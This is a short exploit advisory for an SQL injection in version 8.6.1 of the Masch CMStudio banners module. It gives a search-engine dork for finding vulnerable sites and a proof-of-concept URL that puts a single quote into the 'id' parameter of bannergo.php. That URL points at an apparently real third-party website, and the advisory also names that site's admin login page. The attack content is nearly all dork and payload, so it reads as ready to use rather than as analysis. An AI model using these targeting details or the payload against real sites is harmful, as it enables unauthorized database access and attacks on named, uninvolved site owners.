====================================================================================================================================
| # Title : Masch CMStudio Banners Modules 8.6.1 Sql Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) |
| # Vendor : https://masch.com/en-us/home/ |
| # Dork : bannergo.php inurl:/modules/banners/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] http://www.kaiserzeit.wien/modules/banners/bannergo.php?id=5' <==== inject here
[+] Login http://www.kaiserzeit.wien/admin/login.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================